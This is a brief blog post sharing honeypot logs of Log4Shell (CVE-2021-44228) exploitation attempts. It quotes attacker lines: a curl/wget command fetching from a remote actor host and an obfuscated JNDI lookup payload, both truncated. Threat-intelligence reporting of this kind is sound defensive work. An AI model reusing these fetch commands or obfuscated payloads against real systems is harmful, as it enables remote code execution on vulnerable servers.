Canada Cyber

Monday, December 13, 2021

CVE-2021-44228 exploitation example Canada Cyber

 CVE-2021-44228 

CanadaCyber Honeynet logging data over last 3 days.

We see: 

Actions: "curl -s. RemoteActor:5874/CCyberPubIP:80||wget -q -O- , 

Most recent hits are coming up with obfuscation, 

RemoteActor HTTP/1.1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-"



Posted by CanadaCyber www.canadacyber.com at 8:11 PM
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

No comments:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

About Me

My photo
CanadaCyber www.canadacyber.com
View my complete profile

Blog Archive

  • ►  2022 (2)
    • ►  September (1)
    • ►  August (1)
  • ▼  2021 (3)
    • ▼  December (3)
      • Bypass security and TPM requirement on windows 11 ...
      • CVE-2021-44228 exploitation example Canada Cyber
      • Local Ottawa man laptop compromised by distributed...
  • ►  2020 (2)
    • ►  May (1)
    • ►  April (1)
  • ►  2019 (1)
    • ►  May (1)
  • ►  2018 (1)
    • ►  December (1)
  • ►  2017 (2)
    • ►  September (1)
    • ►  January (1)
  • ►  2016 (6)
    • ►  August (2)
    • ►  March (3)
    • ►  February (1)
  • ►  2015 (13)
    • ►  December (3)
    • ►  August (1)
    • ►  July (1)
    • ►  May (2)
    • ►  April (1)
    • ►  February (3)
    • ►  January (2)
  • ►  2014 (39)
    • ►  December (2)
    • ►  November (5)
    • ►  October (4)
    • ►  September (8)
    • ►  August (7)
    • ►  July (9)
    • ►  May (1)
    • ►  March (2)
    • ►  February (1)
Simple theme. Powered by Blogger.